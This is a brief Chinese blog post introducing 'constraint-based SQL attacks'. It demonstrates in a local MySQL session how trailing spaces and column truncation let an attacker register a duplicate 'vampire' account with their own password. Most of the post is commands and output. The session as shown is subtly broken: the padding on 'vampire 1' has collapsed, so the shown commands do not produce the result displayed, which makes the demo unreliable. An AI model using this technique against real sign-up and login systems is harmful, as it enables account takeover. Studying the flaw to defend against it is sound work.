基于约束的SQL攻击

发小给我看的,以前着实没有看到过,对自己算一个新姿势

网上的基本都是一篇,这篇有代码就看它:https://www.cnblogs.com/ECJTUACM-873284962/p/8977983.html

只能算个骚思路吧

实验部分:

mysql> CREATE DATABASE testing;
Query OK, 1 row affected (0.00 sec)

mysql> USE testing
Database changed
mysql> CREATE TABLE users (
-> username varchar(25),
-> password varchar(25)
-> );
Query OK, 0 rows affected (0.06 sec)

mysql> INSERT INTO users
-> VALUES('vampire', 'my_password');
Query OK, 1 row affected (0.00 sec)

mysql> SELECT * FROM users;
+----------+-------------+
| username | password |
+----------+-------------+
| vampire | my_password |
+----------+-------------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users
-> WHERE username='vampire ';
+----------+-------------+
| username | password |
+----------+-------------+
| vampire | my_password |
+----------+-------------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users
-> WHERE username='vampire 1';
Empty set (0.00 sec)

mysql> INSERT INTO users(username, password)
-> VALUES ('vampire 1',
-> 'random_pass');
Query OK, 1 row affected, 1 warning (0.00 sec)

mysql> SELECT * FROM users
-> WHERE username='vampire';
+---------------------------+-------------+
| username | password |
+---------------------------+-------------+
| vampire | my_password |
| vampire | random_pass |
+---------------------------+-------------+
2 rows in set (0.00 sec)

mysql>


2019.4.15

标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注